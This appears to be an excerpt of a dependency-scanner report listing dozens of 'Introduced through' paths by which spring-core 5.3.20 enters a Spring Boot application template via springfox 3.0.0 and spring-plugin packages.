  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
